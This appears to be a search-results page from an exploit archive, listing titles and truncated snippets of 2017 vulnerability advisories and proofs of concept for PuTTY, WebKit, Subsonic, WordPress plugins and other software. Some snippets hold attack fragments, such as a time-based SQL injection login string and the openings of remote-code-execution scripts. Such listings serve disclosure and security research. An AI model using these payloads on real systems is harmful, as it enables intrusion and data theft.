47904 matches found
PuTTY < 0.68 - 'ssh_agent_channel_data' Integer Overflow Heap Corruption
Source: https://www.chiark.greenend.org.uk/sgtatham/putty/wishlist/vuln-agent-fwd-overflow.html summary: Vulnerability: integer overflow permits memory overwrite by forwarded ssh-agent connections class: vulnerability: This is a security vulnerability. difficulty: fun: Just needs tuits, and not...
Linux Kernel - 'ping' Local Denial of Service
// Source: https://raw.githubusercontent.com/danieljiang0415/androidkernelcrashpoc/master/panic.c include include include include static int sockfd = 0; static struct sockaddrin addr = 0; void fuzzvoid param while1 addr.sinfamily = 0;//rand%42; printf"sinfamily1 = %08lx\n", addr.sinfamily;...
Xavier 2.4 - SQL Injection
Document Title: =============== Xavier v2.4 PHP MP - SQL Injection Web Vulnerabilities References Source: ==================== https://www.vulnerability-lab.com/getcontent.php?id=2076 Release Date: ============= 2017-06-06 Vulnerability Laboratory ID VL-ID: ==================================== 20...
Robert 0.5 - Multiple Vulnerabilities
Exploit Title: Robert 0.5 - Multiple Vulnerabilities XSS, CSRF, Directory traversal & SQLi Date: 07/06/2017 Exploit Author: Cyril Vallicari / HTTPCS - ZIWIT Vendor website :http://robert.polosson.com/ Download link : https://github.com/RobertManager/robert/archive/master.zip Live demo :...
Linux Kernel < 4.10.13 - 'keyctl_set_reqkey_keyring' Local Denial of Service
/ Source: https://bugzilla.novell.com/showbug.cgi?id=1034862 QA REPRODUCER: gcc -O2 -o CVE-2017-7472 CVE-2017-7472.c -lkeyutils ./CVE-2017-7472 will run the kernel out of memory / include include int main for ;; keyctlsetreqkeykeyringKEYREQKEYDEFLTHREADKEYRING;...
DC/OS Marathon UI - Docker (Metasploit)
This module requires Metasploit: http://metasploit.com/download Current source: https://github.com/rapid7/metasploit-framework class MetasploitModule 'DC/OS Marathon UI Docker Exploit', 'Description' = %q Utilizing the DCOS Cluster's Marathon UI, an attacker can create a docker container with the...
Grav CMS 1.4.2 Admin Plugin - Cross-Site Scripting
Exploit Title: GravCMS Core Admin Plugin v1.4.2 - Persistent Cross-Site Scripting Date: 2017-06-07 Exploit Author: Ahsan Tahir Vendor Homepage: https://getgrav.org/ Software Link: https://getgrav.org/download/core/grav-admin/1.2.4 Version: 1.4.2 Tested on: Kali Linux 2.0 | Windows 8.1 Email:...
Artifex MuPDF - Null Pointer Dereference
Source: https://bugs.ghostscript.com/showbug.cgi?id=697500 POC to trigger null pointer dereference mutool After some fuzz testing I found a crashing test case. Git HEAD: 8eea208e099614487e4bd7cc0d67d91489dae642 To reproduce: mutool convert -F cbz nullptrfzpaintpixmapwithmask -o /dev/null ASAN:...
Apple Safari 10.1 - Spread Operator Integer Overflow Remote Code Execution
Sources: https://phoenhex.re/2017-06-02/arrayspread https://github.com/phoenhex/files/blob/master/exploits/spread-overflow JavaScriptCore will allocate a JSFixedArray for every spread operand of the array literal in slowpathspread. As such, roughly 4 billion JSValues will have to be allocated,...
Peplink Balance Routers 7.0.0-build1904 - SQL Injection / Cross-Site Scripting / Information Disclosure
X41 D-Sec GmbH Security Advisory: X41-2017-005 Multiple Vulnerabilities in peplink balance routers =================================================== Overview -------- Confirmed Affected Versions: 7.0.0-build1904 Confirmed Patched Versions:...
Apache Struts - REST Plugin With Dynamic Method Invocation Remote Code Execution
!/usr/bin/python -- coding: utf-8 -- import requests import random import base64 upperAlpha = "ABCDEFGHIJKLMNOPQRSTUVWXYZ" lowerAlpha = "abcdefghijklmnopqrstuvwxyz" numerals = "0123456789" allchars = chr for in xrange0x00, 0xFF + 0x01 def randbaselength, bad, chars: '''generate a random string wi...
WordPress Plugin Tribulant Newsletters 4.6.4.2 - File Disclosure / Cross-Site Scripting
DefenseCode WebScanner DAST Advisory WordPress Tribulant Newsletters Plugin Multiple Security Vulnerabilities Advisory ID: DC-2017-01-012 Advisory Title: WordPress Tribulant Newsletters Plugin Multiple Vulnerabilities Advisory URL: http://www.defensecode.com/advisories.php Software: WordPress...
Linux/x86-64 - /bin/sh Shellcode (31 bytes)
Linux/x86-64 - /bin/sh Shellcode 31 bytes. Shellcode exploit for Linx86-64 platform / ;Title: Linux/x86-64 - /bin/sh Shellcode ;Author: Touhid M.Shaikh ;Contact: https://github.com/touhidshaikh ;Category: Shellcode ;Architecture: Linux x8664 ;Description: This shellcode baased on "JMP CALL POP"...
Kronos Telestaff < 2.92EU29 - SQL Injection
Software: Kronos Telestaff Web Application Version: compare timing with device=stdbrowser&action=doLogin&user='ifDBNAME'TELESTAFF'waitfor%20delay'00%3a00%3a12';--&pwd=&code= PoC 2 - Execute Code Remotely example inject benign code e.g. ping a remote systems ?php $cmdtoexecute = strToHex"pi...
Wireshark 2.2.0 < 2.2.12 - ROS Dissector Denial of Service
Source: https://bugs.wireshark.org/bugzilla/showbug.cgi?id=13637 Build Information: TShark Wireshark 2.3.0 v2.3.0rc0-3235-gd97ce76161 Copyright 1998-2017 Gerald Combs and contributors. License GPLv2+: GNU GPL version 2 or later This is free software; see the source for copying conditions. There i...
Subsonic 6.1.1 - Server-Side Request Forgery
Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-SERVER-SIDE-REQUEST-FORGERY.txt + ISR: ApparitionSec Vendor: ================ www.subsonic.org Product: =============== subsonic v6.1.1 Subsonic is a media...
Subsonic 6.1.1 - Cross-Site Request Forgery / Cross-Site Scripting
Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-CSRF-PERSISTENT-XSS.txt + ISR: ApparitionSec Vendor: ================ www.subsonic.org Product: =============== subsonic v6.1.1 Subsonic is a media streaming...
DNSTracer 1.8.1 - Buffer Overflow (PoC)
Exploit Title: DNSTracer Stack-based Buffer Overflow CVE: CVE-2017-9430 CWE: CWE-119 Exploit Author: Hosein Askari FarazPajohan Vendor HomePage: http://www.mavetju.org Version : 1.8.1 Tested on: Parrot OS Date: 04-06-2017 Category: Application Author Mail : [email protected] Description:...
BIND 9.10.5 - Unquoted Service Path Privilege Escalation
Credits: John Page aka hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/BIND9-PRIVILEGE-ESCALATION.txt + ISR: ApparitionSec Vendor: =========== www.isc.org Product: =========== BIND9 v9.10.5 x86 / x64 BIND is open source software that enables you...
Wireshark 2.2.6 - IPv6 Dissector Denial of Service
Build Information: TShark Wireshark 2.3.0 v2.3.0rc0-3369-g2e2ba64b72 Copyright 1998-2017 Gerald Combs and contributors. License GPLv2+: GNU GPL version 2 or later This is free software; see the source for copying conditions. There is NO warranty; not even for MERCHANTABILITY or FITNESS FOR A...
Parallels Desktop - Virtual Machine Escape
Title: Parallels Desktop - Virtual Machine Escape + Product: Parallels + Vendor: http://www.parallels.com/products/desktop/ + Affected Versions: All Version Author : Mohammad Reza Espargham Linkedin : https://ir.linkedin.com/in/rezasp E-Mail : meatrezadotes , reza.esparghamatgmaildotcom Website :...
Subsonic 6.1.1 - XML External Entity Injection
Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-XML-EXTERNAL-ENITITY.txt + ISR: ApparitionSec Vendor: ================ www.subsonic.org Product: =============== subsonic v6.1.1 Subsonic is a media streaming...
Subsonic 6.1.1 - Cross-Site Request Forgery
Credits: John Page a.k.a hyp3rlinx + Website: hyp3rlinx.altervista.org + Source: http://hyp3rlinx.altervista.org/advisories/SUBSONIC-PASSWORD-RESET-CSRF.txt + ISR: ApparitionSec Vendor: ================ www.subsonic.org Product: =============== subsonic v6.1.1 Subsonic is a media streaming...
WordPress Plugin Event List < 0.7.8 - SQL Injection
Exploit Title: WordPress Plugin Event List = 0.7.8 - SQL Injection Date: 04-06-2017 Exploit Author: Dimitrios Tsagkarakis Website: dtsa.eu Software Link: https://wordpress.org/plugins/event-list/ Version: 0.7.8 CVE : CVE-2017-9429 Category: webapps 1. Description: SQL injection vulnerability in t...
EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 - Remote Code Execution
!/usr/bin/env python coding: utf8 EnGenius EnShare IoT Gigabit Cloud Service 1.4.11 Root Remote Code Execution Vendor: EnGenius Technologies Inc. Product web page: https://www.engeniustech.com Affected version: ESR300 1.4.9, 1.4.7, 1.4.2, 1.4.1.28, 1.4.0, 1.3.1.42, 1.1.0.28 ESR350 1.4.11, 1.4.9,...
WordPress Plugin WP-Testimonials < 3.4.1 - SQL Injection
Exploit Title: WP-Testimonials 3.4.1 Union Based SQL Injection Date: 03-06-2017 Exploit Author: Dimitrios Tsagkarakis Website: dtsa.eu Software Link: https://en-gb.wordpress.org/plugins/wp-testimonials/ Vendor Homepage: http://www.sunfrogservices.com/web-programmer/wp-testimonials/ Version: 3.4.1...
Joomla! Component Payage 2.05 - 'aid' SQL Injection
Exploit Title: Joomla Payage 2.05 - SQL Injection Exploit Author: Persian Hack Team Discovered by : Mojtaba MobhaM Mojtaba Kazemi Vendor Home : https://extensions.joomla.org/extensions/extension/e-commerce/payment-systems/payage/ My Home : http://persian-team.ir/ Google Dork :...
HPE Intelligent Management Center (iMC) 7.2 (E0403P10) - Code Execution
Vulnerability Summary The following advisory describes a Stack Buffer Overflow vulnerability found in HPE Intelligent Management Center version v7.2 E0403P10 Enterprise, this vulnerability leads to an exploitable remote code execution. HPE Intelligent Management Center iMC delivers comprehensive...
Sungard eTRAKiT3 <= 3.2.1.17 - SQL Injection
Software: Sungard eTRAKiT3 Version: 3.2.1.17 and possibly lower CVE: CVE-2016-6566 https://www.kb.cert.org/vuls/id/846103 Vulnerable Component: Login page Description ================ The login form is vulnerable to blind SQL injection by an unauthenticated user. Vulnerabilities ================...
reiserfstune 3.6.25 - Local Buffer Overflow
Title: reiserfstune 3.6.25 – Local Buffer Overflow + Credits / Discovery: Nassim Asrir + Author Contact: [email protected] || https://www.linkedin.com/in/nassim-asrir-b73a57122/ + Author Company: Henceforth + CVE: N/A - Download -...
Disk Sorter 9.7.14 - 'Input Directory' Local Buffer Overflow (PoC)
!/usr/bin/python Exploit Title: DiskSorter v9.7.14 - Input Directory Local Buffer Overflow - PoC Date: 25 May 2017 Exploit Author: n3ckD Vendor Homepage: http://www.disksorter.com/ Software Link: http://www.disksorter.com/setups/disksortersetupv9.7.14.exe Version: Disk Sorter v9.7.14 32-Bit Teste...
CMS Web-Gooroo < 1.141 - Multiple Vulnerabilities
Exploit Title: CMS Web-Gooroo getmegaadmin; 2d626704807d4c5be1b46e85c4070fec - mayhem 2967a371178d713d3898957dd44786af - no success in bruteforce, though... 3. Full path disclosure Almost any file, because of lack of input validation and overall bad design. CMS log file besides DB log location wi...
WebKit - 'CachedFrameBase::restore' Universal Cross-Site Scripting
Click anywhere... function createURLdata, type = 'text/html' return URL.createObjectURLnew Blobdata, type: type; function navigatew, url let a = w.document.createElement'a'; a.href = url; a.click; window.onclick = = window.w = open'about:blank', 'w', 'width=500, height=500'; let i0 =...
WebKit - 'Document::prepareForDestruction' / 'CachedFrame' Universal Cross-Site Scripting
Click anywhere. function createURLdata, type = 'text/html' return URL.createObjectURLnew Blobdata, type: type; function waitForcheck, cb let it = setInterval = if check clearIntervalit; cb; , 10; window.onclick = = window.onclick = null; w = opencreateURL'', '', 'width=500, height=500'; w.onload ...
WebKit JSC - Incorrect Check in emitPutDerivedConstructorToArrowFunctionContextScope
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1173 When a super expression is used in an arrow function, the following code, which generates bytecode, is called. if needsToUpdateArrowFunctionContext && !codeBlock-isArrowFunction bool canReuseLexicalEnvironment =...
WebKit - CachedFrame does not Detach Openers Universal Cross-Site Scripting
tree.parent; Frame openerFrame = mframe-loader.opener; Frame ownerFrame = parentFrame; if !ownerFrame ownerFrame = openerFrame; if !ownerFrame didFailToInitializeSecurityOrigin; return; ... setCookieURLownerFrame-document-cookieURL; // We alias the SecurityOrigins to match Firefox, see Bug 15313 ...
Riverbed SteelHead VCX 9.6.0a - Arbitrary File Read
Exploit title : Arbitry file reading by authenticated users on Riverbed SteelHead VCX Vendor: Riverbed Author: Gregory DRAPERI Date: 03/2017 Software Link: https://www.riverbed.com/gb/products/steelhead/Free-90-day-Evaluation-SteelHead-CX-Virtual-Edition.html Version: SteelHead VCX VCX255U x8664...
WebKit JSC - 'JSObject::ensureLength' ensureLengthSlow Check Failure
/ Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1165 Here's a snippet of JSObject::ensureLength. bool WARNUNUSEDRETURN ensureLengthVM& vm, unsigned length ASSERTlength vectorLength publicLength setPublicLengthlength; return result; |setPublicLength| is called whether...
WebKit - 'Element::setAttributeNodeNS' Use-After-Free
Element::setAttributeNodeNSAttr& attrNode ... setAttributeInternalindex, attrNode.qualifiedName, attrNode.value, NotInSynchronizationOfLazyAttribute; attrNode.attachToElementthis; treeScope.adoptIfNeededattrNode; ensureAttrNodeListForElementthis.append&attrNode; return WTFMoveoldAttrNode;...
Piwigo Plugin Facetag 0.0.3 - Cross-Site Scripting
Exploit Title: Piwigo plugin Facetag , Persistent XSS Date: 31-05-2017 Extension Version: 0.0.3 Software Link: http://piwigo.org/basics/downloads Extension link : http://piwigo.org/ext/extensionview.php?eid=845 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh22 Website:...
OV3 Online Administration 3.0 - SQL Injection
OV3 Online Administration 3.0 Multiple Unauthenticated SQL Injection Vulnerabilities Vendor: novaCapta Software & Consulting GmbH Product web page: http://www.meacon.de Affected version: 3.0 Summary: With the decision to use the OV3 as a platform for your data management, the course is set for...
OV3 Online Administration 3.0 - Directory Traversal
OV3 Online Administration 3.0 Parameter Traversal Arbitrary File Access PoC Exploit Vendor: novaCapta Software & Consulting GmbH Product web page: http://www.meacon.de Affected version: 3.0 Summary: With the decision to use the OV3 as a platform for your data management, the course is set for...
OV3 Online Administration 3.0 - Remote Code Execution
!-- OV3 Online Administration 3.0 Authenticated Code Execution Vendor: novaCapta Software & Consulting GmbH Product web page: http://www.meacon.de Affected version: 3.0 Summary: With the decision to use the OV3 as a platform for your data management, the course is set for scalable, flexible and...
Piwigo Plugin Facetag 0.0.3 - SQL Injection
Exploit Title: Facetag Extension in Piwigo, Multiple SQL injection Date: 30-05-2017 Extension Version: 0.0.3 Software Link: http://piwigo.org/basics/downloads Extension link : http://piwigo.org/ext/extensionview.php?eid=845 Exploit Author: Touhid M.Shaikh Contact: http://twitter.com/touhidshaikh2...
uc-http Daemon - Local File Inclusion / Directory Traversal
''' | \ | \ | | | | | | / \ | | | |/ / | |/ / | | | | | | | | | / / | | | / | / | | | | | | | | | | | | | | | |\ \ \ / / // / | | | /\ | | | | | / / / / / | | | \ | | / | | | / \ | | | | | \ | | | | \ \ / / | | | | | \ --. | | | / / | | | | | |/ / | | | | \ V / | | | . | --. \ | | | |...
KEMP LoadMaster 7.135.0.13245 - Persistent Cross-Site Scripting / Remote Code Execution
Vulnerability Summary KEMP’s main product, the LoadMaster, is a load balancer built on its own proprietary software platform called LMOS, that enables it to run on almost any platform: As a KEMP LoadMaster appliance, a Virtual LoadMaster VLM deployed on HyperV, VMWare, on bare metal or in the...
Microsoft MsMpEng - Remote Use-After-Free Due to Design Issue in GC Engine
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1258 MsMpEng's JS engine uses garbage collection to manage the lifetime of Javascript objects. During mark and sweep the GC roots the vectors representing the JS stack as well as a few other hardcoded objects, traversing reachable...
Trend Micro Deep Security 6.5 - XML External Entity Injection / Local Privilege Escalation / Remote Code Execution
The following advisory describes three 3 vulnerabilities found in Trend Micro Deep Security version 6.5. “The Trend Micro Hybrid Cloud Security solution, powered by XGen security, delivers a blend of cross-generational threat defense techniques that have been optimized to protect physical,...
Microsoft MsMpEng - Use-After-Free via Saved Callers
Source: https://bugs.chromium.org/p/project-zero/issues/detail?id=1259 In JsRuntimeState::setCaller, it saves the current caller in the JsRuntimeState objectrcx+158h in 64-bit. But the garbage collector doesn't mark this saved value. So it results in a UAF. Unlike in our test environmentLinux, it...
TiEmu 2.08 - Local Buffer Overflow
!/usr/bin/python Exploit Author: Juan Sacco at KPN Red Team - http://www.kpn.com Developed using Exploit Pack - http://exploitpack.com - Tested on: Windows 7 32 bits Description: TiEmu Texas Instrument Emulator 2.08 and prior is prone to a stack-based buffer overflow vulnerability because the...